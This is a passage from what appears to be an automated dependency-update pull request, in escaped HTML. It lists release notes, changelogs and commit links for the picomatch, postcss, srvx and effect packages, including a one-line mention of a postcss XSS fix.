href=\"https://github.com/micromatch/picomatch/commit/3f4f10eaa65bf3a52e8f2999674cd27e11fa3c9b\"\u003e\u003ccode\u003e3f4f10e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/144\"\u003e#144\u003c/a\u003e from Jason3S/jdent-object-properties\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `postcss` from 8.5.6 to 8.5.15\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/releases\"\u003epostcss's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/blob/main/CHANGELOG.md\"\u003epostcss's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/33b9790263dc1562a46ce45d9532bd63e95b7986\"\u003e\u003ccode\u003e33b9790\u003c/code\u003e\u003c/a\u003e Release 8.5.10 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/536c79e4b01e58a3a56b09c3c0cf2323f4b9a28b\"\u003e\u003ccode\u003e536c79e\u003c/code\u003e\u003c/a\u003e Escape \u0026lt;/style\u0026gt; in CSS output (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2074\"\u003e#2074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/afa96b2a139ce625c4d27973313479c7c85f39d4\"\u003e\u003ccode\u003eafa96b2\u003c/code\u003e\u003c/a\u003e Update dependencies (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2073\"\u003e#2073\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/effe88bb87cabdc1876e02adbdd30f392f19f40d\"\u003e\u003ccode\u003eeffe88b\u003c/code\u003e\u003c/a\u003e Typo (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2072\"\u003e#2072\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/3ee79a2c4a11e41d52db50b444eebe38299495ad\"\u003e\u003ccode\u003e3ee79a2\u003c/code\u003e\u003c/a\u003e Thread model (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2071\"\u003e#2071\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/2e0683daca4dc2919211b03774f6b2d137136c01\"\u003e\u003ccode\u003e2e0683d\u003c/code\u003e\u003c/a\u003e Create incident response docs (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/fe88ac29c06b7b218be32994cdc6ca1525bdf2c9\"\u003e\u003ccode\u003efe88ac2\u003c/code\u003e\u003c/a\u003e Release 8.5.9 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/c551632496b87ab3f1965bfda5dc386b6c71963e\"\u003e\u003ccode\u003ec551632\u003c/code\u003e\u003c/a\u003e Avoid RegExp when we can use simple JS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/89a6b744060eb8dee743351c785a9fbe37d4525a\"\u003e\u003ccode\u003e89a6b74\u003c/code\u003e\u003c/a\u003e Move SECURITY.txt for docs folder to keep GitHub page cleaner\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/6ceb8a46af9f9de821faee98f861bdf84617347b\"\u003e\u003ccode\u003e6ceb8a4\u003c/code\u003e\u003c/a\u003e Create SECURITY.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/postcss/postcss/compare/8.5.3...8.5.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `srvx` from 0.10.0 to 0.10.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/h3js/srvx/releases\"\u003esrvx's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.11.13\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.12...v0.11.13\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eurl:\u003c/strong\u003e Deopt absolute URIs in FastURL (\u003ca href=\"https://github.com/h3js/srvx/commit/de0d699\"\u003ede0d699\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.12\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.11...v0.11.12\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Improve \u003ccode\u003epipeBody\u003c/code\u003e stability and performance (\u003ca href=\"https://github.com/h3js/srvx/commit/4051f22\"\u003e4051f22\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.11\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.10...v0.11.11\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Handle duck-typed pipe objects in \u003ccode\u003epipeBody\u003c/code\u003e (\u003ca href=\"https://github.com/h3js/srvx/commit/5e731ef\"\u003e5e731ef\u003c/a\u003e, \u003ca href=\"https://github.com/h3js/srvx/commit/f746e79\"\u003ef746e79\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.10\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.9...v0.11.10\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Handle error and abort propagation for piped Node.js streams (\u003ca href=\"https://github.com/h3js/srvx/commit/77f879b\"\u003e77f879b\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Fallback to socket address on invalid Host header (\u003ca href=\"https://redirect.github.com/h3js/srvx/pull/192\"\u003e#192\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Combine duplicate headers in \u003ccode\u003eentries()\u003c/code\u003e iterator (\u003ca href=\"https://github.com/h3js/srvx/commit/4ed7453\"\u003e4ed7453\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e❤️ Contributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePooya Parsa (\u003ca href=\"https://github.com/pi0\"\u003e\u003ccode\u003e@​pi0\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMarc (\u003ca href=\"https://github.com/snrmwg\"\u003e\u003ccode\u003e@​snrmwg\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.9\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.8...v0.11.9\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003estatic:\u003c/strong\u003e Use path separator instead of hardcoded slash (\u003ca href=\"https://redirect.github.com/h3js/srvx/pull/190\"\u003e#190\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003efasturl, node:\u003c/strong\u003e Normalize pathname if necessary (\u003ca href=\"https://github.com/h3js/srvx/commit/bd8c0d3\"\u003ebd8c0d3\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e❤️ Contributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePooya Parsa (\u003ca href=\"https://github.com/pi0\"\u003e\u003ccode\u003e@​pi0\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eJoël Charles (\u003ca href=\"https://github.com/magne4000\"\u003e\u003ccode\u003e@​magne4000\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.8\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.7...v0.11.8\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/h3js/srvx/blob/main/CHANGELOG.md\"\u003esrvx's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.11.13\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.12...v0.11.13\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eurl:\u003c/strong\u003e Deopt absolute URIs in FastURL (\u003ca href=\"https://github.com/h3js/srvx/commit/de0d699\"\u003ede0d699\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e🏡 Chore\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate deps (\u003ca href=\"https://github.com/h3js/srvx/commit/4e6ace6\"\u003e4e6ace6\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate deps (\u003ca href=\"https://github.com/h3js/srvx/commit/6a72a00\"\u003e6a72a00\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix type issue (\u003ca href=\"https://github.com/h3js/srvx/commit/ed8cc2b\"\u003eed8cc2b\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eApply automated updates (\u003ca href=\"https://github.com/h3js/srvx/commit/7375fed\"\u003e7375fed\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate deps (\u003ca href=\"https://github.com/h3js/srvx/commit/8f4bc4f\"\u003e8f4bc4f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e❤️ Contributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePooya Parsa (\u003ca href=\"https://github.com/pi0\"\u003e\u003ccode\u003e@​pi0\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.12\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.11...v0.11.12\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Improve \u003ccode\u003epipeBody\u003c/code\u003e stability and performance (\u003ca href=\"https://github.com/h3js/srvx/commit/4051f22\"\u003e4051f22\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e❤️ Contributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePooya Parsa (\u003ca href=\"https://github.com/pi0\"\u003e\u003ccode\u003e@​pi0\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.11\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.10...v0.11.11\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Handle duck-typed pipe objects in \u003ccode\u003epipeBody\u003c/code\u003e (\u003ca href=\"https://github.com/h3js/srvx/commit/5e731ef\"\u003e5e731ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e✅ Tests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Add duck-typed pipe object test for \u003ccode\u003epipeBody\u003c/code\u003e (\u003ca href=\"https://github.com/h3js/srvx/commit/f746e79\"\u003ef746e79\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e❤️ Contributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePooya Parsa (\u003ca href=\"https://github.com/pi0\"\u003e\u003ccode\u003e@​pi0\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.10\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/e19649a96a33012be5f5c201c11fb388940ade68\"\u003e\u003ccode\u003ee19649a\u003c/code\u003e\u003c/a\u003e chore(release): v0.11.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/8f4bc4f2d00622d980f31b4ab205c6e5ad80c02f\"\u003e\u003ccode\u003e8f4bc4f\u003c/code\u003e\u003c/a\u003e chore: update deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/7375fed4a2bf9fb4b64896ce868937eda7cf686f\"\u003e\u003ccode\u003e7375fed\u003c/code\u003e\u003c/a\u003e chore: apply automated updates\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/ed8cc2b900e25da2f0ec1505da1e2edad867b4b6\"\u003e\u003ccode\u003eed8cc2b\u003c/code\u003e\u003c/a\u003e chore: fix type issue\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/6a72a0031063669d6f8320ad6c9a7cac3254fb41\"\u003e\u003ccode\u003e6a72a00\u003c/code\u003e\u003c/a\u003e chore: update deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/de0d69901c357f36a39b7e13eebef6c930652baa\"\u003e\u003ccode\u003ede0d699\u003c/code\u003e\u003c/a\u003e fix(url): deopt absolute URIs in FastURL\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/4e6ace6b55686acd6125f608ef6ab3ab1efb057f\"\u003e\u003ccode\u003e4e6ace6\u003c/code\u003e\u003c/a\u003e chore: update deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/4a11d45e6e909f8433287fd19efcc6b8d9c01820\"\u003e\u003ccode\u003e4a11d45\u003c/code\u003e\u003c/a\u003e chore(release): v0.11.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/4051f22700997644200c3bff1eac15418f25c78f\"\u003e\u003ccode\u003e4051f22\u003c/code\u003e\u003c/a\u003e fix(node): improve \u003ccode\u003epipeBody\u003c/code\u003e stability and performance\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/f520abaef4685981bd317328723d2ef656e4d707\"\u003e\u003ccode\u003ef520aba\u003c/code\u003e\u003c/a\u003e chore(release): v0.11.11\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/h3js/srvx/compare/v0.10.0...v0.11.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `effect` from 3.19.0 to 3.20.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Effect-TS/effect/releases\"\u003eeffect's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eeffect@3.20.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6124\"\u003e#6124\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/8798a843218e6c0c0d3a8eee83360880e370b4da\"\u003e\u003ccode\u003e8798a84\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mikearnaldi\"\u003e\u003ccode\u003e@​mikearnaldi\u003c/code\u003e\u003c/a\u003e! - Fix scheduler task draining to isolate \u003ccode\u003eAsyncLocalStorage\u003c/code\u003e across fibers.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6107\"\u003e#6107\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/fc82e81448bd9136a37580139ce46a2c61b11b54\"\u003e\u003ccode\u003efc82e81\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Backport \u003ccode\u003eTypes.VoidIfEmpty\u003c/code\u003e to 3.x\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6088\"\u003e#6088\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/82996bce8debffcb44feb98bb862cf2662bd56b7\"\u003e\u003ccode\u003e82996bc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003eSchema.omit\u003c/code\u003e producing wrong result on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and index signatures\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003egetIndexSignatures\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e and \u003ccode\u003egetPropertyKeyIndexedAccess\u003c/code\u003e. Previously, \u003ccode\u003eSchema.omit\u003c/code\u003e on a struct combining \u003ccode\u003eSchema.optionalWith\u003c/code\u003e (with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, etc.) and \u003ccode\u003eSchema.Record\u003c/code\u003e would silently take the wrong code path, returning a Transformation with property signatures instead of a TypeLiteral with index signatures.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6086\"\u003e#6086\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4d97a61a15b9dd6a0eece65b8f0c035e16d42ada\"\u003e\u003ccode\u003e4d97a61\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003egetPropertySignatures\u003c/code\u003e crash on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and other Transformation-producing variants\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eSchemaAST.getPropertyKeyIndexedAccess\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e. Previously, calling \u003ccode\u003egetPropertySignatures\u003c/code\u003e on a \u003ccode\u003eSchema.Struct\u003c/code\u003e containing \u003ccode\u003eSchema.optionalWith\u003c/code\u003e with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, \u003ccode\u003e{ nullable: true }\u003c/code\u003e, or similar options would throw \u003ccode\u003e\u0026quot;Unsupported schema (Transformation)\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6097\"\u003e#6097\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/f6b0960bf3184109920dfed16ee7dfd7d67bc0f2\"\u003e\u003ccode\u003ef6b0960\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Fix TupleWithRest post-rest validation to check each tail index sequentially.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eeffect@3.19.19\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - add short circuit to fiber.await internals\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - build ManagedRuntime synchronously if possible\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6081\"\u003e#6081\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/2d2bb1364a906bd44800c6387b9575fddccdaf53\"\u003e\u003ccode\u003e2d2bb13\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - fix semaphore race condition where permits could be leaked\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eeffect@3.19.18\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6062\"\u003e#6062\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/12b1f1eadf649e30dec581b7351ba3abb12f8004\"\u003e\u003ccode\u003e12b1f1e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - prevent Stream.changes from writing empty chunks\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eeffect@3.19.17\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6040\"\u003e#6040\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/a8c436f7004cc2a8ce2daec589ea7256b91c324f\"\u003e\u003ccode\u003ea8c436f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/jacobconley\"\u003e\u003ccode\u003e@​jacobconley\u003c/code\u003e\u003c/a\u003e! - Fix 